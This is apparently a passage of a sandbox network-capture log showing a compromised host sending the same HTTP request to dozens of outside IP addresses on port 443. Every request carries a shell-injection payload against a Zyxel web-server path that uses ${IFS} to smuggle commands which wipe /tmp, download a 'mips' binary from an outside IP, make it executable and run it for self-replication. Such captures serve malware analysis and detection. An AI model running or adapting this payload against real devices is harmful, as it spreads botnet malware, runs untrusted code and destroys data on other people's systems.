                                        Mar 31, 2024 09:21:13.814148903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4134192.168.2.235490479.34.101.38443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.814212084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4135192.168.2.2359312190.243.144.55443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.814258099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4136192.168.2.2348376172.65.143.240443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.814317942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4137192.168.2.233532475.124.235.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.814353943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4138192.168.2.235454623.69.254.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.814398050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4139192.168.2.2338308167.171.184.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.814438105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4140192.168.2.23388625.193.100.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.814475060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4141192.168.2.2346980212.153.233.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.814546108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4142192.168.2.234292244.246.147.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.814599991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4143192.168.2.234311438.104.10.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.814642906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4144192.168.2.2353712174.17.41.60443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.814683914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4145192.168.2.235379639.209.56.31443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.814727068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4146192.168.2.233646486.18.110.123443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.814779043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4147192.168.2.2338794178.160.38.182443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.814824104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4148192.168.2.234949676.75.133.113443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.814874887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4149192.168.2.235847427.106.177.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.814913034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4150192.168.2.2334084138.153.224.203443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.814994097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4151192.168.2.2336450192.183.64.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.815064907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4152192.168.2.234687676.74.50.111443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.815108061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4153192.168.2.234193467.66.203.33443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.815164089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4154192.168.2.2358546155.7.139.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.815191984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4155192.168.2.2350840140.184.116.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.815227032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4156192.168.2.235548287.123.110.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.815272093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4157192.168.2.2347132105.179.123.232443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.815308094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4158192.168.2.235948485.166.168.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.815339088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4159192.168.2.2358392187.182.70.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.815409899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4160192.168.2.2336424135.128.158.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.815473080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4161192.168.2.2358112184.63.238.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.815501928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4162192.168.2.234704671.70.241.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.815536022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4163192.168.2.2360908202.122.174.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.815577030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4164192.168.2.234655282.28.36.34443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.815613985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4165192.168.2.233949612.20.1.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.815669060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4166192.168.2.23349064.29.12.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.815715075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4167192.168.2.2341644207.230.168.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.815748930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4168192.168.2.2333798187.130.136.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.815783024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4169192.168.2.2358790150.188.171.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.815835953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4170192.168.2.233625644.166.68.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.815869093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4171192.168.2.2352340178.228.119.234443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.815924883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4172192.168.2.2356054192.224.39.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.815975904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4173192.168.2.2353722186.78.103.29443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.816040039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4174192.168.2.235239498.128.166.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.816071987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4175192.168.2.2357640184.2.129.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.816116095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4176192.168.2.2348030116.240.98.111443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.816159964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4177192.168.2.233420618.112.98.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.816214085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4178192.168.2.2338382113.200.181.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.816283941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4179192.168.2.2353000130.121.208.251443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.816334009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4180192.168.2.2343152128.227.135.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.816370010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4181192.168.2.2339744203.75.159.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.816418886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4182192.168.2.2360740104.235.41.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.816481113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4183192.168.2.2354468159.119.15.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.816519976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4184192.168.2.2360096208.36.221.30443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.816574097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4185192.168.2.235652471.11.230.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.816617012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4186192.168.2.2334658181.80.111.223443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.816653967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4187192.168.2.235442887.73.193.96443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.816713095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4188192.168.2.2342114187.66.102.91443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.816773891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4189192.168.2.2337354145.20.132.227443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.816802025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4190192.168.2.2342412101.52.156.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.816833019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4191192.168.2.235559896.178.135.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.816871881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4192192.168.2.2337900204.100.20.109443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.816915989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4193192.168.2.2343958147.60.140.151443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.816967964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4194192.168.2.234781414.173.170.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.817002058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4195192.168.2.2338860122.142.160.118443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.817054033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4196192.168.2.234262291.28.228.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.817114115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4197192.168.2.234695889.46.244.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.817142010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4198192.168.2.234787213.16.168.176443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.817184925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4199192.168.2.235010689.142.161.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.817219019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4200192.168.2.2353014130.121.18.132443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.817271948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4201192.168.2.2342476105.178.152.234443
                                        TimestampBytes transferredDirectionData
